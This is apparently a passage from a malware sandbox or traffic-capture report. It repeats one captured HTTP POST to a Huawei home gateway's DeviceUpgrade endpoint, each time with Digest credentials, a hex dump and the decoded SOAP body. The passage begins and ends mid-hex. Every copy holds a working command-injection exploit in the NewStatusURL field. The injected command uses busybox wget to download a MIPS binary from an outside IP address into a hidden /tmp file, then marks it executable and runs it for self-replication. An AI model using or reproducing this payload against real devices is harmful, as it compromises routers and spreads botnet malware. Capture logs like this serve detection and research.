79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 